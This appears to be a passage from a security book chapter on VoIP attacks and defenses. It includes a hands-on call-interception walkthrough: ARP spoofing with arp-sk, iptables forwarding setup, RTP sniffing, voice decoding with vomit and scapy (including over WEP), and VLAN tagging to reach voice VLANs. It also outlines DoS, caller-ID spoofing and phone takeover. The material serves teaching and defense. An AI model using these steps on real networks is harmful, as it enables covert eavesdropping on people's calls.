Voice over IP (VoIP) is a very generic term that is used to describe the transport of voice on top of an IP network. A VoIP deployment can range from a very basic setup to enable a point-to-point communication between two users to a full carrier-grade infrastructure in order to provide new communication services to customers and end users. Most VoIP solutions rely on multiple protocols, at least one for signaling and one for transport of the encoded voice traffic. Currently the two most common signaling protocols are H.323 and Session Initiation Protocol (SIP), and their role is to manage call setup, modification, and closing.
H.323 is actually a suite of protocols defined by the International Telecommunication Union (ITU), and its messages are encoded in ASN.1. Its deployed base is still larger than SIP's, and it was designed to make integration with the public switched telephone network (PSTN) easier.
SIP is the Internet Engineering Task Force (IETF) protocol, and the number of deployments using it or migrating to it from H.323 is growing rapidly. SIP is not only used to signal voice traffic; it also drives a number of other solutions and tools, such as instant messaging (IM). SIP is similar in style to HTTP, and it implements different methods and response codes. The encoding is text (UTF-8), and SIP uses port 5060 (TCP/UDP) for communication.
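Because SIP is text-based and HTTP-like, a message can be split into a start line, headers, and a body with a few string operations. The following is a minimal sketch, not a complete SIP parser: the function name `parse_sip_message` and the sample INVITE (addresses, tags, Call-ID) are made up for illustration, and repeated headers and header folding are deliberately ignored.

```python
def parse_sip_message(raw: str):
    """Split a SIP message into (start_line, headers, body).

    Simplification: a repeated header (for example several Via lines)
    overwrites the earlier value, and folded headers are not handled.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    start_line = lines[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start_line, headers, body


# Hypothetical INVITE; every address and identifier here is invented.
SAMPLE_INVITE = (
    "INVITE sip:bob@example.com SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.1.1:5060;branch=z9hG4bK776asdhds\r\n"
    "From: <sip:alice@example.com>;tag=1928301774\r\n"
    "To: <sip:bob@example.com>\r\n"
    "Call-ID: a84b4c76e66710@192.168.1.1\r\n"
    "CSeq: 314159 INVITE\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

start_line, headers, body = parse_sip_message(SAMPLE_INVITE)
method, request_uri, version = start_line.split(" ")
print(method, request_uri, version)
print(headers["cseq"])
```

The request line has the same three-part shape as an HTTP request line (method, target, protocol version), which is what makes SIP traffic easy to read in a sniffer.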
The Real-time Transport Protocol (RTP) transports the encoded voice traffic. The control channel for RTP is provided by the RTP Control Protocol (RTCP) and consists mainly of quality of service (QoS) information (delay, packet loss, jitter, and so on). RTP runs on top of UDP, and both the source and destination port may be dynamic (5004/UDP is common). RTP doesn't handle QoS itself; this needs to be provided by the network (packet/frame marking, classification, and queuing).
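To make the jitter figure reported over RTCP more concrete, here is a small sketch of the interarrival jitter estimate defined in RFC 3550: for each packet, the change in transit time D is computed, and the running estimate is updated as J = J + (|D| - J) / 16. The function name and the sample values are assumptions for illustration; both timestamps are expressed in RTP timestamp units (8000 per second for G.711).

```python
def interarrival_jitter(packets):
    """Estimate interarrival jitter from (rtp_timestamp, arrival_time) pairs.

    Both values must be in the same units (RTP timestamp units).
    Implements the running estimate J += (|D| - J) / 16 from RFC 3550.
    """
    jitter = 0.0
    prev_transit = None
    for rtp_timestamp, arrival_time in packets:
        transit = arrival_time - rtp_timestamp
        if prev_transit is not None:
            d = abs(transit - prev_transit)
            jitter += (d - jitter) / 16.0
        prev_transit = transit
    return jitter


# Hypothetical stream: one packet every 160 timestamp units (20 ms of
# G.711); the third packet arrives 16 units (2 ms) late.
sample = [(0, 1000), (160, 1160), (320, 1336), (480, 1480)]
print(interarrival_jitter(sample))
```

A perfectly paced stream yields a jitter of zero; the estimate grows only when the spacing between arrivals differs from the spacing between RTP timestamps.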
There's one major difference between traditional voice networks using a PBX and a VoIP setup: In the case of VoIP, the RTP stream doesn't have to cross any voice infrastructure device and is exchanged directly between the endpoints (that is, RTP is phone-to-phone).
The more advanced or more complex solutions rely on many additional protocols: RADIUS or LDAP for user and credentials management, proprietary protocols for multimedia extensions, and TFTP/DHCP/DNS when the phone boots up, and so on.
VoIP setups are prone to a wide range of attacks. This is mainly because you need to expose a large number of interfaces and protocols to the end user, because the quality of service on the network is a key driver for the quality of the VoIP system, and because the infrastructure is usually quite complex.
The easiest attack, even if not very rewarding, is denial of service. It is easy to do, quite anonymous, and very effective. You can, for example, DoS the infrastructure by sending a large amount of fake call-setup signaling traffic (SIP INVITE), or DoS a single phone by flooding it with unwanted traffic (unicast or multicast). Any network denial of service (intended or due to a worm) will have an adverse effect on the quality of the VoIP system if the network is not QoS enabled.
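An INVITE flood of this kind shows up as an unusually high call-setup rate from one source. The sketch below counts INVITEs per source address over a sliding time window; the class name `InviteRateMonitor`, the threshold, and the window length are all hypothetical and would need tuning against real traffic.

```python
from collections import defaultdict, deque


class InviteRateMonitor:
    """Flag sources that send more than max_invites within window_seconds."""

    def __init__(self, max_invites, window_seconds):
        self.max_invites = max_invites
        self.window_seconds = window_seconds
        self.seen = defaultdict(deque)  # source IP -> recent timestamps

    def record(self, source_ip, timestamp):
        """Record one INVITE; return True if the source is over the limit."""
        recent = self.seen[source_ip]
        recent.append(timestamp)
        # Drop timestamps that have fallen out of the window.
        while recent and timestamp - recent[0] > self.window_seconds:
            recent.popleft()
        return len(recent) > self.max_invites


# Hypothetical limit: at most 3 INVITEs per second from one address.
monitor = InviteRateMonitor(max_invites=3, window_seconds=1.0)
flags = [monitor.record("192.168.1.5", t / 10) for t in range(5)]
print(flags)
```

This only detects a single noisy source; a flood with spoofed source addresses would need a different signal, such as the global rate of incomplete call setups.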
Call spoofing (that is, identity theft) is another quite common attack: It enables the user to spoof the CLID (Caller ID) while making a call. This may enable access to the legitimate user's voicemail if the system only relies on the CLID and doesn't require a PIN.
Injection of data into an established communication is also doable, but more complex, and the result may not be perfect (that is, the parties may notice it). This can be done by injecting RTP packets, but some TCP/IP stacks on intermediate systems (gateways) or end systems (soft or hard phone) may behave in strange ways (leading sometimes to a crash) when they receive out-of-sequence or nearly duplicate RTP data.
Altering the phone's configuration is usually quite simple. If you have network connectivity to the phone, you can try to access it using the common management interfaces that may be exposed, such as an unprotected telnet CLI or HTTP interface (with a simple password or no password at all, sometimes not even requiring a username). If this access isn't granted, you can try to take over the phone using your own DHCP and TFTP servers: When the phone boots, it first gets an IP address and network information via DHCP and then downloads its configuration (and sometimes updated firmware) over TFTP. Depending on whether the deployment relies only on IP addresses or not, the DNS protocol may be part of the process as well, and DNS spoofing may be helpful, too.
Most of the new applications linked with VoIP deployments (such as advanced voicemail, instant messaging, calendar services, but also user management) are web-based services. These applications are often full of bugs (cross-site scripting, form field verification done only in client-side JavaScript, no boundary checking, SQL injection, and so on), and the known methods used to penetrate web applications can be used to break into the system and gain access to value-added numbers, other users' voicemail, Call Detail Records (CDRs), and so on.
In some environments, where all calls are recorded (for legal reasons, for example), gaining access to the call storage system may give access to sensitive and confidential information. Obviously this is the pot of gold at the end of the rainbow for many attackers, so implementing strong host-based security (as described in previous chapters) is critical.
Fraud detection is another issue that concerns mainly carriers and telecommunication companies: Users shouldn't be able to access value-added numbers if they're not allowed to, nor should they be able to send RTP traffic without the correct signaling being completed with the call manager servers. This is especially important for companies providing VoIP-to-PSTN gateways.
Also, as with e-mail, the absence of SIP header stripping may leak topology and other interesting information to an attacker.
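As a rough illustration of header stripping, the sketch below removes purely informational headers from a SIP message before it leaves a trusted network. The choice of headers is an assumption made for this example (`User-Agent` and `Server` reveal software and version); headers such as `Via` and `Record-Route` also expose internal addresses, but they are needed for routing and have to be rewritten by the border device instead of deleted, which this sketch does not attempt.

```python
# Assumption: only these informational headers are dropped in this sketch.
# A real policy depends on the deployment and on the border device in use.
INFORMATIONAL_HEADERS = frozenset({"user-agent", "server"})


def strip_sip_headers(raw, drop=INFORMATIONAL_HEADERS):
    """Return the SIP message with the named headers removed."""
    head, separator, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    kept = [lines[0]]  # always keep the request or status line
    for line in lines[1:]:
        name = line.partition(":")[0].strip().lower()
        if name not in drop:
            kept.append(line)
    return "\r\n".join(kept) + separator + body


# Hypothetical message; the product name and addresses are invented.
SAMPLE = (
    "INVITE sip:bob@example.com SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 10.0.0.7:5060;branch=z9hG4bK776asdhds\r\n"
    "User-Agent: ExamplePhone 1.2.3\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
print(strip_sip_headers(SAMPLE))
```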
Popularity: | 5 |
Simplicity: | 5 |
Impact: | 9 |
Risk Rating: | 6 |
Although the interception attack may sound simple and straightforward, it's usually the one that impresses the most. First, you need to intercept the RTP stream: You may sit somewhere on the path between the caller and the called persons, but that's not often the case anymore due to the use of switches instead of hubs. To overcome this problem, an attacker can employ ARP spoofing. ARP spoofing works well on many enterprise networks because the security features available in switches today are not often activated, and end systems will happily accept the new entries. Quite a number of deployments try to transport the VoIP traffic on a dedicated VLAN on the network to simplify the overall manageability of the solution as well as to enhance the quality of service. An attacker should easily be able to access the VoIP VLAN from any desk, because the phone is generally used to provide connectivity to the PC and performs the VLAN tagging of the traffic.
On the interception server, you should first turn on routing, allow the traffic, turn off ICMP redirects, and then reincrement the TTL using iptables. The TTL would otherwise be decremented because the Linux server is routing and not bridging; the TTL target used for this is a simple patch-o-matic extension to iptables. The commands are shown here:
    # echo 1 > /proc/sys/net/ipv4/ip_forward
    # iptables -I FORWARD -i eth0 -o eth0 -j ACCEPT
    # echo 0 > /proc/sys/net/ipv4/conf/eth0/send_redirects
    # iptables -t mangle -A FORWARD -j TTL --ttl-inc 1
At this point, after using dsniff's arpspoof (http://www.monkey.org/~dugsong/dsniff) or arp-sk (http://www.arp-sk.org) to corrupt the client's ARP cache, you should be able to access the VoIP datastream using a sniffer.
In our example, we have the following:
Phone_A | 00:50:56:01:01:01 | 192.168.1.1 |
Phone_B | 00:50:56:01:01:02 | 192.168.1.2 |
Bad_guy | 00:50:56:01:01:05 | 192.168.1.5 |
The attacker, whom we will call Bad_guy, has a MAC/IP address of 00:50:56:01:01:05/192.168.1.5 and uses the eth0 interface to sniff traffic:
    # arp-sk -w -d Phone_A -S Phone_B -D Phone_A
    + Initialization of the packet structure
    + Running mode "who-has"
    + Ifname: eth0
    + Source MAC: 00:50:56:01:01:05
    + Source ARP MAC: 00:50:56:01:01:05
    + Source ARP IP : 192.168.1.2
    + Target MAC: 00:50:56:01:01:01
    + Target ARP MAC: 00:00:00:00:00:00
    + Target ARP IP : 192.168.1.1
    ---Start classical sending ---
    TS: 20:42:48.782795
    To: 00:50:56:01:01:01 From: 00:50:56:01:01:05 0x0806
    ARP Who has 192.168.1.1 (00:00:00:00:00:00) ?
    Tell 192.168.1.2 (00:50:56:01:01:05)
    TS: 20:42:53.803565
    To: 00:50:56:01:01:01 From: 00:50:56:01:01:05 0x0806
    ARP Who has 192.168.1.1 (00:00:00:00:00:00) ?
    Tell 192.168.1.2 (00:50:56:01:01:05)
At this point, Phone_A thinks that Phone_B is at 00:50:56:01:01:05 (Bad_guy). The tcpdump output shows the ARP traffic:
    # tcpdump -i eth0 -ne arp
    20:42:48.782992 00:50:56:01:01:05 > 00:50:56:01:01:01, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.1 tell 192.168.1.2
    20:42:55.803799 00:50:56:01:01:05 > 00:50:56:01:01:01, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.1 tell 192.168.1.2
Now, here's the same attack against Phone_B in order to sniff the return traffic:
    # arp-sk -w -d Phone_B -S Phone_A -D Phone_B
    + Initialization of the packet structure
    + Running mode "who-has"
    + Ifname: eth0
    + Source MAC: 00:50:56:01:01:05
    + Source ARP MAC: 00:50:56:01:01:05
    + Source ARP IP : 192.168.1.1
    + Target MAC: 00:50:56:01:01:02
    + Target ARP MAC: 00:00:00:00:00:00
    + Target ARP IP : 192.168.1.2
    ---Start classical sending ---
    TS: 20:43:48.782795
    To: 00:50:56:01:01:02 From: 00:50:56:01:01:05 0x0806
    ARP Who has 192.168.1.2 (00:00:00:00:00:00) ?
    Tell 192.168.1.1 (00:50:56:01:01:05)
    TS: 20:43:53.803565
    To: 00:50:56:01:01:02 From: 00:50:56:01:01:05 0x0806
    ARP Who has 192.168.1.2 (00:00:00:00:00:00) ?
    Tell 192.168.1.1 (00:50:56:01:01:05)
At this point, Phone_B thinks that Phone_A is also at 00:50:56:01:01:05 (Bad_guy). The tcpdump output shows the ARP traffic:
    # tcpdump -i eth0 -ne arp
    20:43:48.782992 00:50:56:01:01:05 > 00:50:56:01:01:02, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.2 tell 192.168.1.1
    20:43:55.803799 00:50:56:01:01:05 > 00:50:56:01:01:02, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.2 tell 192.168.1.1
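From a defender's point of view, the two spoofed exchanges leave a recognizable trace: a single MAC address (Bad_guy's) announces itself as the owner of both phones' IP addresses. The following sketch flags any MAC that claims more than one IP in a list of observed ARP sender pairs. The function name is hypothetical, and the heuristic is deliberately crude; a router doing proxy ARP or a multihomed host would also be flagged.

```python
from collections import defaultdict


def find_suspicious_macs(observations):
    """Return {mac: sorted IPs} for every MAC claiming more than one IP.

    observations is an iterable of (sender_ip, sender_mac) pairs taken
    from ARP traffic.
    """
    ips_by_mac = defaultdict(set)
    for ip, mac in observations:
        ips_by_mac[mac].add(ip)
    return {
        mac: sorted(ips)
        for mac, ips in ips_by_mac.items()
        if len(ips) > 1
    }


# Sender pairs matching the example network in this section.
observed = [
    ("192.168.1.2", "00:50:56:01:01:05"),  # spoofed frame sent to Phone_A
    ("192.168.1.1", "00:50:56:01:01:05"),  # spoofed frame sent to Phone_B
    ("192.168.1.1", "00:50:56:01:01:01"),  # genuine Phone_A
    ("192.168.1.2", "00:50:56:01:01:02"),  # genuine Phone_B
]
print(find_suspicious_macs(observed))
```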
Now that the environment is ready, Bad_guy can start to sniff the UDP traffic:
    # tcpdump -i eth0 -n host 192.168.1.1
    21:53:28.838301 192.168.1.1.27182 > 192.168.1.2.19560: udp 172 [tos 0xb8]
    21:53:28.839383 192.168.1.2.19560 > 192.168.1.1.27182: udp 172
    21:53:28.858884 192.168.1.1.27182 > 192.168.1.2.19560: udp 172 [tos 0xb8]
    21:53:28.859229 192.168.1.2.19560 > 192.168.1.1.27182: udp 172
Because in most cases the only UDP traffic that the phones are sending is the RTP stream, it's quite easy to identify the local ports (27182 and 19560, in the preceding example). A better approach is to follow the SIP exchanges and get the port information from the Media Port field in the Media Description section.
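The media port is carried in the `m=` line of the SDP body attached to the SIP messages, in the form `m=<media> <port> <transport> <formats>`. Here is a minimal sketch that pulls the audio port and format list out of an SDP body; the function name and the sample SDP are made up for illustration, with the port chosen to match the capture above.

```python
def audio_media_ports(sdp: str):
    """Return a list of (port, transport, formats) for each m=audio line."""
    results = []
    for line in sdp.splitlines():
        if line.startswith("m=audio "):
            fields = line[2:].split()
            # fields: media, port (optionally "port/count"), transport, formats
            port = int(fields[1].split("/")[0])
            results.append((port, fields[2], fields[3:]))
    return results


# Hypothetical SDP body as it might appear in Phone_A's INVITE.
SAMPLE_SDP = (
    "v=0\r\n"
    "o=- 0 0 IN IP4 192.168.1.1\r\n"
    "s=-\r\n"
    "c=IN IP4 192.168.1.1\r\n"
    "t=0 0\r\n"
    "m=audio 27182 RTP/AVP 0\r\n"
    "a=rtpmap:0 PCMU/8000\r\n"
)
print(audio_media_ports(SAMPLE_SDP))
```

The format list (`0` here) is the set of RTP payload types the phone offers, so the same line also hints at the codec.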
Once you have identified the RTP stream, you need to identify the codec that has been used to encode the voice. You find this information in the Payload Type (PT) field of the RTP header or in the Media Format field in the SIP exchange that identifies the format of the data transported by RTP. Most basic phones use G.711, also known as Pulse Code Modulation (PCM); phones that want to optimize bandwidth usage use G.729.
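The payload type sits in the low seven bits of the second byte of the 12-byte fixed RTP header. The sketch below unpacks that header and maps a few static payload types from RFC 3551 to codec names; the function name and the sample packet are assumptions. The 172-byte UDP payloads in the capture above would be consistent with a 12-byte header plus 160 bytes of G.711 (20 ms at 8000 samples per second), although that is an inference and not something the capture states.

```python
import struct

# A few static payload types from RFC 3551.
STATIC_PAYLOAD_TYPES = {
    0: "PCMU (G.711 mu-law)",
    8: "PCMA (G.711 A-law)",
    18: "G729",
}


def parse_rtp_header(datagram: bytes):
    """Decode the 12-byte fixed RTP header at the start of a UDP payload."""
    if len(datagram) < 12:
        raise ValueError("too short for an RTP header")
    byte0, byte1, sequence, timestamp, ssrc = struct.unpack(
        "!BBHII", datagram[:12]
    )
    return {
        "version": byte0 >> 6,
        "marker": bool(byte1 & 0x80),
        "payload_type": byte1 & 0x7F,
        "sequence": sequence,
        "timestamp": timestamp,
        "ssrc": ssrc,
    }


# Hypothetical packet: version 2, payload type 0, 160 bytes of payload.
packet = struct.pack("!BBHII", 0x80, 0x00, 1, 160, 0x12345678) + bytes(160)
header = parse_rtp_header(packet)
print(len(packet), header["version"], header["payload_type"])
print(STATIC_PAYLOAD_TYPES.get(header["payload_type"], "dynamic or unknown"))
```

Payload types from 96 upward are dynamic; for those, the codec has to be read from the signaling, not from the RTP header alone.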
A tool such as vomit (http://vomit.xtdnet.nl) enables you to convert the conversation from G.711 to WAV based on a tcpdump output file. The following command will play the converted output stream on the speakers using waveplay:
    $ vomit -r sniff.tcpdump | waveplay -S8000 -B16 -C1
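The conversion itself is simple for G.711: every payload byte is one companded sample that expands to a 16-bit linear value. The following sketch decodes mu-law payloads (payload type 0) and writes a mono, 16-bit, 8000 Hz WAV file, matching the `-S8000 -B16 -C1` parameters above. It illustrates the idea only and is not how vomit is implemented: the function names are hypothetical, A-law needs a different expansion, and packet reordering, loss, and silence are ignored.

```python
import io
import struct
import wave


def ulaw_to_linear(byte):
    """Expand one G.711 mu-law byte to a signed 16-bit linear sample."""
    byte = ~byte & 0xFF
    sign = byte & 0x80
    exponent = (byte >> 4) & 0x07
    mantissa = byte & 0x0F
    magnitude = (((mantissa << 3) + 0x84) << exponent) - 0x84
    return -magnitude if sign else magnitude


def ulaw_payloads_to_wav(payloads, out):
    """Write RTP payloads (mu-law bytes, already in order) as a WAV file.

    out may be a filename or a binary file-like object.
    """
    samples = [ulaw_to_linear(b) for payload in payloads for b in payload]
    with wave.open(out, "wb") as wav:
        wav.setnchannels(1)      # mono
        wav.setsampwidth(2)      # 16-bit samples
        wav.setframerate(8000)   # G.711 sampling rate
        wav.writeframes(struct.pack("<%dh" % len(samples), *samples))


# Hypothetical input: one 20 ms packet of mu-law silence (0xFF).
buffer = io.BytesIO()
ulaw_payloads_to_wav([bytes([0xFF]) * 160], buffer)
print(len(buffer.getvalue()), "bytes of WAV data")
```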
A better tool is scapy (http://www.secdev.org/projects/scapy). With scapy, you can sniff the live traffic (from eth0), and scapy will decode the RTP stream (G.711) from/to the phone at 192.168.1.1 and feed the voice over two streams that it regulates (when there's no voice, there's no traffic, for example) to soxmix, which in turn will play it on the speakers:
    # ./scapy
    Welcome to Scapy (0.9.17.20beta)
    >>> voip_play("192.168.1.1", iface="eth0")
Another advantage of scapy is that it will decode all the lower transport layers transparently. You can, for example, play a stream of VoIP transported on a WEP-secured WLAN directly if you give scapy the WEP key. To do this, you first need to put the WLAN interface into monitor mode:
    # iwconfig wlan0 mode monitor
    # ./scapy
    Welcome to Scapy (0.9.17.20beta)
    >>> conf.wepkey="enter_WEP_key_here"
    >>> voip_play("192.168.1.1", iface="wlan0")
In case the physical port you connect to is a trunk, you first need to make sure your kernel supports VLANs/dot1q and then load the kernel module, configure the VLAN, and put an IP address on the virtual interface so that it creates the correct /proc entry:
    # modprobe 8021q
    # vconfig add eth0 187
    Added VLAN with VID == 187 to IF -:eth0:-
    # ifconfig eth0.187 192.168.1.5
When this is done, you can use the commands listed earlier with eth0.187 instead of eth0. If you run tcpdump on the interface eth0 instead of eth0.187, you'll see the Ethernet traffic with the VLAN ID (that is, tagged):
    # tcpdump -i eth0 -ne arp
    17:21:42.882298 00:50:56:01:01:05 > 00:50:56:01:01:01 8100 46: 802.1Q vlan#187 P0 arp who-has 192.168.1.1 tell 192.168.1.2
    17:21:47.882151 00:50:56:01:01:05 > 00:50:56:01:01:01 8100 46: 802.1Q vlan#187 P0 arp who-has 192.168.1.1 tell 192.168.1.2
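The `8100`, `vlan#187`, and `P0` fields in that output come from the 4-byte 802.1Q tag inserted after the source MAC address: a tag protocol identifier of 0x8100 followed by 16 bits of tag control information, whose low 12 bits are the VLAN ID and whose top 3 bits are the priority. A minimal sketch of decoding it from a raw Ethernet frame follows; the function name and the hand-built frame are assumptions for illustration.

```python
import struct


def parse_vlan_tag(frame: bytes):
    """Return (vlan_id, priority, inner_ethertype), or None if untagged."""
    if len(frame) < 18:
        return None
    # Bytes 0-11 are the destination and source MAC addresses.
    tpid, tci, inner_ethertype = struct.unpack("!HHH", frame[12:18])
    if tpid != 0x8100:
        return None
    return tci & 0x0FFF, tci >> 13, inner_ethertype


# Hypothetical tagged ARP frame from Bad_guy to Phone_A on VLAN 187.
frame = (
    bytes.fromhex("005056010101")               # destination MAC
    + bytes.fromhex("005056010105")             # source MAC
    + struct.pack("!HHH", 0x8100, 187, 0x0806)  # 802.1Q tag, then ARP
    + bytes(28)                                 # ARP payload (zeroed here)
)
print(len(frame), parse_vlan_tag(frame))
```

The tag adds 4 bytes to the frame, which is why the tagged ARP frames are reported as 46 bytes where the untagged ones earlier were 42.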
We have shown you how to intercept traffic directly between two phones. You could use the same approach to capture the stream between a phone and a gateway or between two gateways.
Another interception approach, which is close to the one used to take over a phone while it boots, uses a fake DHCP server. You can then give the phone your IP as the default gateway and at least get one side of the communication.
A number of defense and protection features are built into most of the recent hardware and software, but quite often they are not used. Sometimes this is for reasons that are understandable (such as the impact of end-to-end encryption on delay and jitter, but also due to regulations and laws), but way too often it's because of laziness.
Encryption is available in Secure RT(C)P, Transport Layer Security (TLS), and Multimedia Internet Keying (MIKEY), which can be used with SIP. H.235 provides security mechanisms for H.323.
Moreover, firewalls can and should be deployed to protect the VoIP infrastructure core. When selecting a firewall, you should make sure it handles the protocols at the application layer; a stateful firewall is often not enough because the needed information is carried in different protocols' header or payload data. Network edge components such as session border controllers help to protect the customer- and partner-facing systems against denial of service attacks and rogue RTP traffic.
The phones should only download signed configurations and firmware, and they should also use TLS to identify the servers, and vice versa. Keep in mind that the only difference between a phone and a PC is its shape. Therefore, as with any system, you need to take host security into account when deploying handsets in your network.